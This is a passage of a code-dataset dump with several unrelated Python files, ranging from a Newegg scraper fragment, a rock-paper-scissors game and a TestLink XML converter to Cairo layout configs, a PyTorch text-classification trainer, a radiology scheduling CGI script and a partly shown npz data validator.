except Exception as e:\n print (itemsId, \":\", e)\n with open('./except.txt', 'aw') as f:\n f.write(itemsId + '\\n')\n\n\n#去重后的items的id文件\ndef start(items_file):\n\n global result_file, lock, titles\n\n item_file = open(items_file, 'r')\n\n result_file = open('./items_db.csv', 'w')\n items_list = item_file.readlines()\n lock = Lock()\n pool = Pool(10)\n #调用函数把items_list的内容依次传入handle函数中\n pool.map(handle, items_list)\n pool.close()\n pool.join()\n\n item_file.close()\n result_file.close()\n\n\nif __name__ == \"__main__\":\n start('./items_db_last.txt')\n","sub_path":"购物类/Newegg/get_newegg_db.py","file_name":"get_newegg_db.py","file_ext":"py","file_size_in_byte":9745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"421799582","text":"'''\n Assignment Day-5\n Rock, paper, scissors\n'''\nfrom random import choice\n\ndef comp_pick():\n pick = choice([\"rock\", \"paper\", \"scissors\"])\n print(\"Computer picked \" + pick)\n return pick\n\ndef compare_picks(user_in, comp_in):\n if user_in == comp_in:\n return \"Tie!\"\n elif user_in == \"rock\" and comp_in == \"paper\":\n return \"Computer wins!\"\n elif user_in == \"paper\" and comp_in == \"scissors\":\n return \"Computer wins!\"\n elif user_in == \"scissors\" and comp_in == \"rock\":\n return \"Computer wins!\"\n else:\n return \"You wins!\"\n\n\nif __name__ == '__main__':\n print(\"Rock, Paper, Scissors...\")\n \n while True:\n user = input(\"What's your pick? \\n\").lower()\n if user is 'exit':\n break\n elif user not in ['rock', 'paper', 'scissors']:\n print(user + \"is not one of the choices\\n\")\n else:\n print(compare_picks(user, comp_pick()))","sub_path":"Day5/Day5_assignment.py","file_name":"Day5_assignment.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"598533033","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\nПреобразователь кастомного формата кейсов для TestLink в родной xml\n\"\"\"\n\n\nimport argparse\nimport logging\nimport logging.config\n\n\ndef init_logger():\n \"\"\"\n Initialize logger\n \"\"\"\n\n loggin_config = {\n 'version': 1,\n 'formatters': {\n 'default': {\n 'format': '[%(asctime)s][%(levelname)9s]: %(message)s'\n },\n },\n 'handlers': {\n 'console': {\n 'level': 'DEBUG',\n 'class': 'logging.StreamHandler',\n 'formatter': 'default',\n },\n # 'file': {\n # 'level': 'DEBUG',\n # 'class': 'logging.FileHandler',\n # 'formatter': 'default',\n # 'filename': 'out1.log',\n # # 'mode': 'w',\n # # 'encoding': 'utf-8',\n # },\n },\n 'root': {\n 'level': 'DEBUG',\n # 'handlers': ['console', 'file']\n 'handlers': ['console']\n },\n }\n\n logging.config.dictConfig(loggin_config)\n\n\ndef test():\n \"\"\"\n Simple docsting test\n \"\"\"\n import doctest\n doctest.testmod()\n\n\ndef insert_suite_header(name, fout):\n data=\"\"\"\n \n \n
    \n\n \"\"\".format(name)\n\n fout.write(data)\n\n\ndef insert_suite_footer(fout):\n data=\"\"\"\n
    \n \"\"\"\n fout.write(data)\n\n\ndef insert_case_header(name, summary, precond, fout):\n data=\"\"\"\n \n \n \n\n \n\n \n\n \n \n \n 1\n 1\n 1\n\n \n \"\"\".format(name, summary, precond)\n\n fout.write(data)\n\n\ndef insert_case_footer(fout):\n data=\"\"\"\n \n \n \"\"\"\n\n fout.write(data)\n\n\ndef insert_case_step(step_num, actions, expected_results, fout):\n data=\"\"\"\n \n \n\n \n\n \n\n \n \n \"\"\".format()\n\n fout.write(data)\n\n\n\ndef main():\n \"\"\"\n Start point\n \"\"\"\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-i\", \"--input\", dest=\"input_file\", default=\"\",\n help=\"Input file\")\n parser.add_argument(\"-o\", \"--output\", dest=\"output_file\", default=\"\",\n help=\"Output file\")\n args = parser.parse_args()\n\n with open(args.input_file) as fin:\n with open(args.output_file, 'w') as fout:\n fout.write('')\n\n insert_suite_header('Требования Росгвардии', fout)\n # for line in reversed(list(fin)):\n in_suite_l1 = False\n in_suite_l2 = False\n for line in list(fin):\n line = line.rstrip()\n\n if line.startswith(',,'):\n line = line[2:] # remove first ',,'\n insert_case_header(line, '', '', fout)\n insert_case_footer(fout)\n\n elif line.startswith(','):\n if in_suite_l2:\n insert_suite_footer(fout)\n line = line[1:] # remove first ','\n insert_suite_header(line, fout)\n in_suite_l2 = True\n\n else:\n if in_suite_l2:\n insert_suite_footer(fout)\n in_suite_l2 = False\n\n if in_suite_l1:\n insert_suite_footer(fout)\n\n insert_suite_header(line, fout)\n in_suite_l1 = True\n\n if in_suite_l2:\n insert_suite_footer(fout)\n if in_suite_l1:\n insert_suite_footer(fout)\n\n insert_suite_footer(fout)\n\n\nif __name__ == \"__main__\":\n # test()\n init_logger()\n logging.info('Started')\n main()\n logging.info('Finished')\n","sub_path":"program/tl-create-cases-from-txt-1.py","file_name":"tl-create-cases-from-txt-1.py","file_ext":"py","file_size_in_byte":4473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"602077167","text":"import dataclasses\nfrom dataclasses import field\nfrom typing import Any, Dict, Optional\n\nfrom starkware.cairo.lang.builtins.bitwise.instance_def import CELLS_PER_BITWISE, BitwiseInstanceDef\nfrom starkware.cairo.lang.builtins.hash.instance_def import CELLS_PER_HASH, PedersenInstanceDef\nfrom starkware.cairo.lang.builtins.range_check.instance_def import (\n CELLS_PER_RANGE_CHECK, RangeCheckInstanceDef)\nfrom starkware.cairo.lang.builtins.signature.instance_def import (\n CELLS_PER_SIGNATURE, EcdsaInstanceDef)\n\n\n@dataclasses.dataclass\nclass CpuInstanceDef:\n # Verifies that each 'call' instruction returns, even if the called function is malicious.\n safe_call: bool = True\n\n\n@dataclasses.dataclass\nclass CairoLayout:\n layout_name: str = ''\n cpu_component_step: int = 1\n # Range check units.\n rc_units: int = 16\n builtins: Dict[str, Any] = field(default_factory=lambda: {})\n # The ratio between the number of public memory cells and the total number of memory cells.\n public_memory_fraction: int = 4\n memory_units_per_step: int = 8\n diluted_units_per_step: Optional[int] = None\n cpu_instance_def: CpuInstanceDef = field(default=CpuInstanceDef())\n\n\nCELLS_PER_BUILTIN = dict(\n pedersen=CELLS_PER_HASH,\n range_check=CELLS_PER_RANGE_CHECK,\n ecdsa=CELLS_PER_SIGNATURE,\n bitwise=CELLS_PER_BITWISE,\n)\n\nplain_instance = CairoLayout(\n layout_name='plain',\n)\n\nsmall_instance = CairoLayout(\n layout_name='small',\n rc_units=16,\n builtins=dict(\n output=True,\n pedersen=PedersenInstanceDef(\n ratio=8,\n repetitions=4,\n element_height=256,\n element_bits=252,\n n_inputs=2,\n hash_limit=2**251 + 17 * 2**192 + 1,\n ),\n range_check=RangeCheckInstanceDef(\n ratio=8,\n n_parts=8,\n ),\n ecdsa=EcdsaInstanceDef(\n ratio=512,\n repetitions=1,\n height=256,\n n_hash_bits=251,\n ),\n )\n)\n\ndex_instance = CairoLayout(\n layout_name='dex',\n rc_units=4,\n builtins=dict(\n output=True,\n pedersen=PedersenInstanceDef(\n ratio=8,\n repetitions=4,\n element_height=256,\n element_bits=252,\n n_inputs=2,\n hash_limit=2**251 + 17 * 2**192 + 1,\n ),\n range_check=RangeCheckInstanceDef(\n ratio=8,\n n_parts=8,\n ),\n ecdsa=EcdsaInstanceDef(\n ratio=512,\n repetitions=1,\n height=256,\n n_hash_bits=251,\n ),\n )\n)\n\nall_instance = CairoLayout(\n layout_name='all',\n rc_units=8,\n public_memory_fraction=8,\n diluted_units_per_step=16,\n builtins=dict(\n output=True,\n pedersen=PedersenInstanceDef(\n ratio=8,\n repetitions=4,\n element_height=256,\n element_bits=252,\n n_inputs=2,\n hash_limit=2**251 + 17 * 2**192 + 1,\n ),\n range_check=RangeCheckInstanceDef(\n ratio=8,\n n_parts=8,\n ),\n ecdsa=EcdsaInstanceDef(\n ratio=512,\n repetitions=1,\n height=256,\n n_hash_bits=251,\n ),\n bitwise=BitwiseInstanceDef(\n ratio=256,\n diluted_spacing=4,\n diluted_n_bits=16,\n total_n_bits=251,\n ),\n )\n)\n\nLAYOUTS: Dict[str, CairoLayout] = {\n 'plain': plain_instance,\n 'small': small_instance,\n 'dex': dex_instance,\n 'all': all_instance,\n}\n","sub_path":"vendor/cairo-lang/src/starkware/cairo/lang/instances.py","file_name":"instances.py","file_ext":"py","file_size_in_byte":3555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"653597633","text":"import os, logging, sys, getpass\n\nfrom tthAnalysis.HiggsToTauTau.tthAnalyzeSamples_3l_1tau_2015 import samples_2015\nfrom tthAnalysis.HiggsToTauTau.tthAnalyzeSamples_3l_1tau_2016 import samples_2016\nfrom tthAnalysis.HiggsToTauTau.prodNtupleConfig_3l_1tau import prodNtupleConfig_3l_1tau\nfrom tthAnalysis.HiggsToTauTau.jobTools import query_yes_no\n\n#ERA = \"2015\"\nERA = \"2016\"\n\nsamples = None\nLUMI = None\nif ERA == \"2015\":\n samples = samples_2015\n LUMI = 2.3e+3 # 1/pb\nelif ERA == \"2016\":\n samples = samples_2016\n LUMI = 12.9e+3 # 1/pb\nelse:\n raise ValueError(\"Invalid Configuration parameter 'ERA' = %s !!\" % ERA)\n\nversion = \"2017Jan12_forBDTtraining\" # must be the same version as in test/tthAnalyzeRun_3l_1tau.py !\n\n#-------------------------------------------------------------------------------- \n# CV: run Ntuple production jobs also for high statistics background samples\n# not used in the analysis, but used for BDT training by Arun\nfor sample_name, sample_info in samples_2016.items():\n if sample_name in [\n \"/TT_TuneCUETP8M1_13TeV-powheg-pythia8/RunIISpring16MiniAODv1-PUSpring16_80X_mcRun2_asymptotic_2016_v3_ext3-v1/MINIAODSIM\",\n \"/TT_TuneCUETP8M1_13TeV-powheg-pythia8/RunIISpring16MiniAODv1-PUSpring16_80X_mcRun2_asymptotic_2016_v3_ext4-v1/MINIAODSIM\",\n \"/TTW/spring16DR80v6aMiniAODv1/FASTSIM\",\n \"/TTZToLLNuNu_M-10_TuneCUETP8M1_13TeV-amcatnlo-pythia8/RunIISpring16MiniAODv2-premix_withHLT_80X_mcRun2_asymptotic_v14_ext1-v1/MINIAODSIM\",\n \"/WZTo3LNu_TuneCUETP8M1_13TeV-powheg-pythia8/RunIISpring16MiniAODv2-PUSpring16_80X_mcRun2_asymptotic_2016_miniAODv2_v0-v1/MINIAODSIM\",\n \"/ttHToNonbb_M125_13TeV_powheg_pythia8/RunIISpring16MiniAODv2-PUSpring16RAWAODSIM_reHLT_80X_mcRun2_asymptotic_v14-v1/MINIAODSIM\" ]:\n sample_info[\"use_it\"] = True\n else:\n sample_info[\"use_it\"] = False\n#-------------------------------------------------------------------------------- \n\nif __name__ == '__main__':\n logging.basicConfig(\n stream = sys.stdout,\n level = logging.INFO,\n format = '%(asctime)s - %(levelname)s: %(message)s')\n\n ntupleProduction = prodNtupleConfig_3l_1tau(\n outputDir = os.path.join(\"/home\", getpass.getuser(), \"ttHNtupleProduction\", ERA, version),\n executable_prodNtuple = \"produceNtuple_3l_1tau\",\n cfgFile_prodNtuple = \"produceNtuple_3l_1tau_forBDTtraining_cfg.py\",\n samples = samples,\n era = ERA,\n debug = False,\n running_method = \"sbatch\",\n rle_directory = 'default', # [*]\n version = version,\n num_parallel_jobs = 4)\n # [*] if rle_directory is set to 'default', then it looks files in /home/$USER/ttHAnalysis/era/version/rles/channel\n # set it to '', if no RLE selection is needed\n \n ntupleProduction.create()\n\n run_ntupleProduction = query_yes_no(\"Start jobs ?\")\n if run_ntupleProduction:\n ntupleProduction.run()\n else:\n sys.exit(0)\n\n","sub_path":"test/tthPreselNtuple_3l_1tau_forBDTtraining.py","file_name":"tthPreselNtuple_3l_1tau_forBDTtraining.py","file_ext":"py","file_size_in_byte":2856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"71895962","text":"# -*- coding: utf-8 -*-\n# @Time : 2021/1/21 8:29 下午\n# @Author : jeffery\n# @FileName: trainer_sigmoid.py\n# @website : http://www.jeffery.ink/\n# @github : https://github.com/jeffery0628\n# @Description:\n\n\nfrom utils import inf_loop, MetricTracker\nfrom base import BaseTrainer\nimport torch\nimport numpy as np\nimport model.adversarial as module_adversarial\nimport model.metric as module_mertric\nimport json\n\nclass Trainer(BaseTrainer):\n \"\"\"\n Trainer class\n \"\"\"\n\n def __init__(self, model, criterion, metric_ftns, optimizer, config,i_fold, data_loader,\n valid_data_loader=None, test_data_loader=None, lr_scheduler=None, len_epoch=None):\n super().__init__(model, criterion, metric_ftns, optimizer, config)\n self.config = config\n self.i_fold = i_fold\n self.data_loader = data_loader\n if len_epoch is None:\n # epoch-based training\n self.len_epoch = len(self.data_loader)\n else:\n # iteration-based training\n self.data_loader = inf_loop(data_loader)\n self.len_epoch = len_epoch\n self.valid_data_loader = valid_data_loader\n self.test_data_loader = test_data_loader\n\n self.lr_scheduler = lr_scheduler\n self.log_step = int(np.sqrt(data_loader.batch_size))\n\n self.train_metrics = MetricTracker('loss', *[m.__name__ for m in self.metric_ftns], writer=self.writer)\n self.valid_metrics = MetricTracker('loss', *[m.__name__ for m in self.metric_ftns], writer=self.writer)\n\n def _train_epoch(self, epoch):\n \"\"\"\n Training logic for an epoch\n\n :param epoch: Integer, current training epoch.\n :return: A log that contains average loss and metric in this epoch.\n \"\"\"\n self.model.zero_grad()\n self.train_metrics.reset()\n adv_train = self.config.init_obj('adversarial_training',module_adversarial,model=self.model)\n K = 3\n for batch_idx, data in enumerate(self.data_loader):\n self.model.train()\n ids,texts, input_ids, attention_masks, text_lengths, labels = data\n\n if 'cuda' == self.device.type:\n input_ids = input_ids.cuda(self.device)\n attention_masks = attention_masks.cuda(self.device)\n labels = labels.cuda(self.device)\n\n preds, cls_embedding = self.model(input_ids, attention_masks,text_lengths)\n loss = self.criterion[0](preds, labels)\n # 损失截断\n loss_zeros = torch.zeros_like(loss)\n loss = torch.where(loss > float(self.config.config['loss']['loss_cut']), loss, loss_zeros)\n loss.backward()\n if self.config.config['trainer']['is_adversarial_training'] and self.config.config['adversarial_training']['type']=='FGM': # 对抗训练\n adv_train.attack()\n adv_preds,adv_cls_embedding = self.model(input_ids,attention_masks,text_lengths)\n adv_loss = self.criterion[0](adv_preds, labels)\n adv_loss.backward()\n adv_train.restore()\n elif self.config.config['trainer']['is_adversarial_training'] and self.config.config['adversarial_training']['type']=='PGD':\n adv_train.backup_grad()\n # 对抗训练\n for t in range(K):\n adv_train.attack(is_first_attack=(t == 0)) # 在embedding上添加对抗扰动, first attack时备份param.data\n if t != K - 1:\n self.model.zero_grad()\n else:\n adv_train.restore_grad()\n adv_preds, adv_cls_embedding= self.model(input_ids,attention_masks,text_lengths)\n adv_loss = self.criterion[0](adv_preds, labels)\n adv_loss.backward() # 反向传播,并在正常的grad基础上,累加对抗训练的梯度\n adv_train.restore() # 恢复embedding参数\n\n if self.config.config['trainer']['clip_grad']: # 梯度截断\n torch.nn.utils.clip_grad_norm_(self.model.parameters(), self.config.config['trainer']['max_grad_norm'])\n self.optimizer.step()\n if self.lr_scheduler is not None:\n self.lr_scheduler.step()\n self.model.zero_grad()\n self.writer.set_step((epoch - 1) * self.len_epoch + batch_idx)\n self.train_metrics.update('loss', loss.item())\n\n for met in self.metric_ftns:\n self.train_metrics.update(met.__name__, met(preds, labels))\n\n if batch_idx % self.log_step == 0:\n self.logger.debug('Train Epoch: {} {} Loss: {:.3f} lr: {}'.format(epoch, self._progress(batch_idx),\n loss.item(),self.optimizer.param_groups[0]['lr']))\n if batch_idx == self.len_epoch:\n break\n\n log = self.train_metrics.result()\n if self.valid_data_loader:\n val_log = self._valid_epoch(epoch)\n log.update(**{'val_' + k: v for k, v in val_log.items()})\n return log\n\n def _valid_epoch(self, epoch):\n \"\"\"\n Validate after training an epoch\n\n :param epoch: Integer, current training epoch.\n :return: A log that contains information about validation\n \"\"\"\n self.model.eval()\n self.valid_metrics.reset()\n\n with torch.no_grad():\n for batch_idx, data in enumerate(self.valid_data_loader):\n ids,texts, input_ids, attention_masks, text_lengths, labels = data\n if 'cuda' == self.device.type:\n input_ids = input_ids.cuda(self.device)\n attention_masks = attention_masks.cuda(self.device)\n labels = labels.cuda(self.device)\n preds,cls_embedding = self.model(input_ids, attention_masks,text_lengths)\n\n if self.add_graph:\n input_model = self.model.module if (len(self.config.config['device_id']) > 1) else self.model\n self.writer.writer.add_graph(input_model,\n [input_ids, attention_masks, text_lengths])\n self.add_graph = False\n loss = self.criterion[0](preds, labels)\n self.writer.set_step((epoch - 1) * len(self.valid_data_loader) + batch_idx, 'valid')\n self.valid_metrics.update('loss', loss.item())\n\n for met in self.metric_ftns:\n self.valid_metrics.update(met.__name__, met(preds, labels))\n\n log = self.valid_metrics.result()\n # add histogram of model parameters to the tensorboard\n for name, p in self.model.named_parameters():\n self.writer.add_histogram(name, p, bins='auto')\n return log\n\n def _inference(self):\n \"\"\"\n Inference after training an epoch\n\n :param epoch: Integer, current training epoch.\n :return: A log that contains information about validation\n \"\"\"\n checkpoint = torch.load(self.best_path)\n self.logger.info(\"load best mode {} ...\".format(self.best_path))\n self.model.load_state_dict(checkpoint['state_dict'])\n self.model.eval()\n\n ps = []\n ls = []\n with torch.no_grad():\n for batch_idx, data in enumerate(self.valid_data_loader):\n ids,texts, input_ids, attention_masks, text_lengths, labels = data\n if 'cuda' == self.device.type:\n input_ids = input_ids.cuda(self.device)\n attention_masks = attention_masks.cuda(self.device)\n labels = labels.cuda(self.device)\n preds,cls_embedding = self.model(input_ids, attention_masks,text_lengths)\n ps.append(preds)\n ls.append(labels)\n\n ps = torch.cat(ps,dim=0)\n ls = torch.cat(ls,dim=0)\n acc = module_mertric.binary_accuracy(ps,ls)\n self.logger.info('\\toverall acc :{}'.format(acc))\n\n result_file = self.test_data_loader.dataset.data_dir.parent / 'result' /'{}-{}-{}-{}-{}.jsonl'.format(\n self.config.config['experiment_name'],\n self.test_data_loader.dataset.transformer_model,\n self.config.config['k_fold'],self.i_fold,acc)\n\n if not result_file.parent.exists():\n result_file.parent.mkdir()\n\n result_writer = result_file.open('w')\n\n with torch.no_grad():\n for batch_idx, data in enumerate(self.test_data_loader):\n ids,texts, input_ids, attention_masks, text_lengths, labels = data\n if 'cuda' == self.device.type:\n input_ids = input_ids.cuda(self.device)\n attention_masks = attention_masks.cuda(self.device)\n preds,cls_embedding = self.model(input_ids, attention_masks,text_lengths)\n preds =torch.round(torch.sigmoid(preds)).cpu().detach().numpy()\n for pred, item_id, text in zip(preds, ids, texts):\n result_writer.write(json.dumps({\n \"id\": item_id,\n \"text\": text,\n \"labels\": int(pred)\n }, ensure_ascii=False) + '\\n')\n\n result_writer.close()\n self.logger.info('result saving to {}'.format(result_file))\n\n def _progress(self, batch_idx):\n base = '[{}/{} ({:.0f}%)]'\n if hasattr(self.data_loader, 'n_samples'):\n current = batch_idx * self.data_loader.batch_size\n total = self.data_loader.n_samples\n else:\n current = batch_idx\n total = self.len_epoch\n return base.format(current, total, 100.0 * current / total)\n","sub_path":"trainer/trainer_sigmoid.py","file_name":"trainer_sigmoid.py","file_ext":"py","file_size_in_byte":9801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"190488599","text":"#!/usr/bin/env python2.7\n# (c) Copyright 2013 Greg Rogalski. All Rights Reserved. \n# \n# rad.py\n#\n# Displays monthly calendar either by radiologist, or by rotation\n#\n\nimport cgi\nimport schedinc\nfrom utils import radcal\nfrom utils import rotation\nfrom utils.holiday import HolidayList\nfrom utils import radiologist\nfrom utils import schedule\nfrom admin import scratchpad\nfrom utils import isodate\nfrom utils import schedutils\nfrom utils import style\nfrom assignote import SchedNoteList\nimport datetime\n\ndef monthly_by_rad(S, radname, start_date=None):\n \"\"\"Generate monthly calendar for radiologist 'radname'\n optional: starting on start_date:isodate.Isodate object\"\"\"\n if start_date:\n start_year = start_date.y\n start_month = start_date.m\n else:\n t = datetime.date.today(hours_offset=S.sgb.timezone_offset)\n start_year = t.year\n start_month = t.month\n \n rcal = radcal.RadCalendar(S)\n oldest = S.get_maxdate() # Find oldest date on the schedule\n \n # loop through all the months from now till end of schedule\n for (Y,M) in schedutils.month_year_iter(start_month,start_year, oldest.m+1, oldest.y):\n S.sgb.output( rcal.htmlmonthcss(M,Y, radname, day_callback_byrad,\n prev_next_link_list=(None, None, None)))\n S.sgb.output(\"

    \")\n\ndef monthly_by_rot(S, # schedule obj, already initialized and loaded with data\n rotname,\n start_date=None # when to start , defaults to today\n):\n if start_date == None:\n start_date = isodate.today(hours_offset=S.sgb.timezone_offset)\n\n rcal = radcal.RadCalendar(S)\n oldest = S.get_maxdate() # Find oldest date on the schedule\n \n # loop through all the months from now till end of schedule\n for month in range(start_date.m, oldest.m+1):\n S.sgb.output( rcal.htmlmonthcss(month,\n start_date.y, rotname, day_callback_byrot,\n prev_next_link_list=(None, None, None)))\n S.sgb.output(\"

    \")\n\n\ndef day_callback_byrad(schedobj, thedate, radname, handle=None):\n \"\"\" Returns assignments and a format string for the element\n \"\"\"\n # radidx = radiologist.RadList.get_index_by_radname(radname)\n try:\n asslist = schedobj.get_assignments(str(thedate),radname)\n except schedule.ScheduleError: # ignore if we access schedule that wasn't loaded in\n asslist = []\n\n # pick a color for the cell\n if thedate == isodate.today(hours_offset=schedobj.sgb.timezone_offset):\n cssclass = 'today'\n ### FIXME: do a check for a changed (yellow) day here!\n ### class=changed\n elif thedate < isodate.today(hours_offset=schedobj.sgb.timezone_offset):\n cssclass = 'oldday'\n elif schedobj.is_modified(thedate, radname):\n cssclass = 'changed'\n elif thedate.is_weekend() or HolidayList.is_holiday(thedate):\n cssclass = 'weekend'\n elif len(asslist) > 0:\n cssclass = 'assignedday'\n else:\n cssclass = 'emptyday'\n\n s = []\n if schedobj.snl and schedobj.snl.hasnotes(str(thedate), radname) > 0:\n # FIXME: don't display icon IF note put in by 'admin' - done by me for schedule purposes\n # OK to show the note, just don't have to advertise it\n media_dir = schedobj.sgb.media\n s.append('' % media_dir)\n \n\n for rotname in asslist:\n formatstr = rotation.Rotation.get_rot_format(rotname)\n if formatstr:\n s.append( formatstr )\n else:\n s.append( \"

    %s\" % rotname)\n\n return (cssclass, \"foobar\", \"\\n\".join(s))\n \ndef day_callback_byrot(schedobj, thedate, rotname, handle=None):\n \"\"\" Returns assignments and a format string for the element\n \"\"\"\n rotobj = schedobj.get_rotobj(rotname, thedate)\n asslist = schedobj.get_assigned_rads(str(thedate),rotname)\n\n # List assignments to all SUBclasses as well\n # e.g.; if given MIC, show MIC-CAR, MIC-ELK, MIC-ELK_MAM, etc\n # if given MIC-ELK, also show MIC-ELK-MAM, etc\n # if given WKND, show all weekend calls\n # must work even if class is 'virtual'\n\n if not rotobj:\n # there was nobody assigned on this day, hence rotobj wasn't created\n # but we still need to find the subclasses,\n # so create a new instance just to find subclass list\n rotobj = rotation.make_new_rotation_obj(rotname)\n\n # now look for all rads assigned to subclasses as well.\n subclasses = schedutils.get_all_subclasses(rotobj.__class__)\n if subclasses and len(subclasses) > 0:\n for rot in subclasses:\n asslist.extend(schedobj.get_assigned_rads(thedate, rot.rotname))\n \n # pick a color for the cell\n if thedate == isodate.today(hours_offset=schedobj.sgb.timezone_offset):\n cssclass = 'today'\n ### FIXME: do a check for a changed (yellow) day here!\n ### cssclass='changed'\n elif thedate < isodate.today(hours_offset=schedobj.sgb.timezone_offset):\n cssclass = 'oldday'\n elif thedate.is_weekend() or HolidayList.is_holiday(thedate):\n cssclass = 'weekend'\n elif len(asslist) > 0:\n cssclass = 'assignedday'\n else:\n cssclass = 'emptyday'\n \n s = []\n for radname in asslist:\n s.append( \"

    %s\" % radname)\n\n return (cssclass, \"foobar\", \"\\n\".join(s))\n \nif __name__ == '__main__':\n sgb = schedinc.SchedGlob(None)\n # FIXME move the following line to schedinc: output right after text/html\n # sgb.output(\"\"\"\"\"\")\n rotation.Rotation.read_from_db(sgb.get_dbhandle())\n radiologist.RadList(sgb.get_dbhandle())\n HolidayList.load_holidays(sgb.get_dbhandle())\n\n t = isodate.today(hours_offset=sgb.timezone_offset)\n \n form = cgi.FieldStorage()\n catname = form.getfirst(\"name\",\"\").upper()\n if catname == None:\n raise Exception(\"Must supply name= argument\")\n category = form.getfirst(\"cat\",\"\").upper()\n if category == None:\n raise Exception(\"Must supply cat= argument\")\n schedtype = form.getfirst(\"type\",\"\").upper()\n if schedtype == \"\" or schedtype == None:\n schedtype = \"SCHEDULE\"\n\n if schedtype == \"SCHEDULE\" or schedtype == \"LINT\":\n S = schedule.Schedule(sgb)\n elif schedtype == \"SCRATCHPAD\":\n S = scratchpad.ScratchPad(sgb)\n else:\n raise Exception(\"Unknown schedule type: type=\")\n \n rcal = radcal.RadCalendar(S)\n\n start_date = form.getfirst(\"start\")\n if start_date:\n new_date = isodate.Isodate(str(start_date))\n start_date = isodate.Isodate(\"%s-%s-01\" % (new_date.y, new_date.m)) #include full preceding month\n else:\n start_date=isodate.Isodate(\"%s-%s-01\" % (t.y, t.m))\n\n sgb.output( style.header(\"Schedule for %s\" % catname.capitalize(),\n media_dir=sgb.get_media_URL()))\n \n sgb.output( style.menu(sgb))\n sgb.output( \"

    Schedule for %s

    \" % catname.capitalize())\n \n sgb.output( \"
    \\n\")\n\n S.import_from_db(start_date=start_date)\n S.snl = SchedNoteList(sgb.get_dbhandle())\n \n if category == 'RAD':\n monthly_by_rad(S, catname, start_date)\n elif category == 'ROT':\n monthly_by_rot(S,catname, start_date)\n else:\n raise Exception(\"Can't understand request cat=%s\" % category)\n \n sgb.output( \"
    \\n\")\n \n sgb.db_logout()\n\n","sub_path":"rad.py","file_name":"rad.py","file_ext":"py","file_size_in_byte":7748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"570625946","text":"from typing import List\n\n# https://leetcode.com/problems/rotate-image/discuss/18884/Seven-Short-Solutions-(1-to-7-lines)\nclass Solution:\n def rotate(self, A: List[List[int]]) -> None:\n \"\"\"\n Do not return anything, modify matrix in-place instead.\n \"\"\"\n A.reverse()\n for i in range(len(A)):\n for j in range(i):\n A[i][j], A[j][i] = A[j][i], A[i][j]\n\n\nif __name__ == \"__main__\":\n matrix = [\n [1, 2, 3],\n [4, 5, 6],\n [7, 8, 9]\n ]\n print(matrix)\n sol = Solution()\n sol.rotate(matrix)\n print(matrix)","sub_path":"problems/48_rotate_image.py","file_name":"48_rotate_image.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"243854211","text":"import requests\nimport time\n\nurl = 'https://landgov.donorplatform.org/ajax/map/get-programs-details'\nresp = requests.get(url=url)\ndata = resp.json() # Check the JSON Response Content documentation below\n\ntimestr = time.strftime(\"%Y%m%d-%H%M%S\")\nfilename_output = timestr+\"-get-programs-details.txt\"\n\nwith open(filename_output, 'w') as file:\n file.write(data[\"html\"].encode('utf8'))\n\nwith open(\"programs-details.txt\", 'w') as file:\n file.write(data[\"html\"].encode('utf8'))","sub_path":"landprojects/projects_map_of_donors/0-get-programs-details.py","file_name":"0-get-programs-details.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"111932519","text":"from pathlib import Path\nfrom typing import Optional, Union\n\nimport numpy as np\n\nfrom activity_viewer.base import type_check\nfrom activity_viewer.constants import AP_MAX, DV_MAX, LR_MAX\n\nPathType = Union[str, Path]\n\n\nclass NpzLoader:\n \"\"\"Class for loading data files.\"\"\"\n\n def __init__(self):\n self._data = None\n self._file_path = None\n self._keys = None\n\n def _validate_data(self):\n \"\"\"Ensure data is valid.\"\"\"\n # probe insertion\n try:\n probe_insertion = self._data[\"probe_insertion\"]\n except KeyError:\n raise KeyError(\"Data missing 'probe_insertion' field.\")\n\n # 1 value\n if probe_insertion.size != 1:\n raise ValueError(\"Too many values for probe_insertion.\")\n\n # a string\n probe_insertion = probe_insertion.reshape(-1)[0]\n if not isinstance(probe_insertion, str):\n raise TypeError(f\"Expecting a string for probe_insertion, got {type(probe_insertion).__name__}\")\n\n # unit ids\n try:\n unit_id = self._data[\"unit_id\"]\n except KeyError:\n raise KeyError(\"Data missing 'unit_id' field.\")\n\n # integer ids\n if not np.issubdtype(unit_id.dtype, np.integer):\n raise TypeError(f\"Expecting integer unit ids, got {unit_id.dtype}.\")\n\n unit_id = unit_id.reshape(-1) # flatten the array\n nunits = unit_id.size\n\n # all unique\n nunique = np.unique(unit_id).size\n if nunique != nunits:\n raise ValueError(f\"Expecting {nunits} unique unit ids, got {nunique}.\")\n\n # CCF coordinates\n try:\n ccf_coord = self._data[\"ccf_coord\"]\n except KeyError:\n raise KeyError(\"Data missing 'ccf_coord' field.\")\n\n # numeric values\n if not np.issubdtype(ccf_coord.dtype, np.integer) and not np.issubdtype(ccf_coord.dtype, np.floating):\n raise TypeError(f\"Expecting numeric CCF coordinates, got {ccf_coord.dtype}.\")\n\n # 3 coords for each unit\n if ccf_coord.shape != (nunits, 3):\n raise ValueError(f\"Expecting a {nunits} x 3 array for ccf_coord, got {ccf_coord.shape}\")\n\n # x values in range\n if ((ccf_coord[:, 0] < 0) | (ccf_coord[:, 0] > AP_MAX)).any():\n raise ValueError(f\"Some coordinates in x column were outside the allowed range of [0, {AP_MAX}].\")\n\n # y values in range\n if ((ccf_coord[:, 1] < 0) | (ccf_coord[:, 1] > DV_MAX)).any():\n raise ValueError(f\"Some coordinates in y column were outside the allowed range of [0, {DV_MAX}].\")\n\n # z values in range\n if ((ccf_coord[:, 2] < 0) 